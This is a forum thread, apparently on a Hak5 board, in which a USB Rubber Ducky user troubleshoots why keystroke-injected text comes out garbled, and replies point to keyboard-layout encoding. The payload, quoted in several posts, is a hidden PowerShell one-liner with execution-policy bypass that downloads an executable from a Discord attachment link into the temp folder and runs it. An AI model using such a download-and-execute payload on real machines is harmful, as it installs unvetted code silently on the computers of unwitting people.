Jump to content

Payload powershell wget execute


Recommended Posts

Hello im a newb to usb rubber ducky,I received mine 4 days ago for pen testing, and I have a small problem with the STRING code.

Here the code bellow I used.

DELAY 200
CONTROL ESCAPE
DELAY 300
STRING run
DELAY 100
ENTER
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/796873244677242910/calc.exe',\"$env:temp\calc.exe\"); Start-Process \"$env:temp\calc.exe\""
ENTER

 

When executed in a notepad.exe ,I get this code with alot of @ and #

 

powershell -NoP -NonI -W Hidden -Exec Bypass @IEX (New-Object System.Net.WebClient).DownloadFile(<https:##cdn.discordapp.com#attachments#777729234181029919#796873244677242910#calc.exe<,@$env:tempbob.exe@); Start-Process @$env:tempbob.exe@@

What im doing wrong? can someone help

 

 

 

Link to post
Share on other sites

It seems as if you need to specify a keyboard language when creating the payload/inject.bin - is the "victim" anything else than US keyb layout?

Link to post
Share on other sites

I own corsair k70 keyboard

Everything look good using the ca-fr.json on https://shop.hak5.org/pages/ducky-encoder except one thing the usb rubber ducky does not recognize this key

---> "  
the ducky remplace it for this key --->\  

powershell -NoP -NonI -W Hidden -Exec Bypass \IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/797350378844848148/calc.exe',\\$env:temp\12345.exe\\); Start-Process \\$env:temp\12345.exe\\\ after the execution that the code missing alots of "

Ducky must click on Shift and this one surronded in red ,but click on shift + \ the left key beside 1 key

12345.PNG
 

Orignal code
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/797350378844848148/calc.exe',\"$env:temp\12345.exe\"); Start-Process \"$env:temp\12345.exe\""




 

Edited by myapple851
Link to post
Share on other sites

So, even if something is still not correct, something has changed between your first an last post; @ has become \, what did you change? Forward slashes / also seems to have been changed to now be correct (was previously the # char in the first post), also < seems to be correct as it's ' in the latest example of your output.

Also not sure what keyboard layout you have in the screenshot of your On-Screen Keyboard. I configured one of my Windows 10 boxes for Canadian French and Canadian-French (Legacy) and none of them showed the mapping you have captured in your screen shot. Your physical keyboard doesn't matter, btw. I used the chars that gives you problems with other keyboard layouts and I have no problems running my payloads that contains those chars. Perhaps the ca-fr.json language map file isn't all correct?

Edited by chrizree
Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...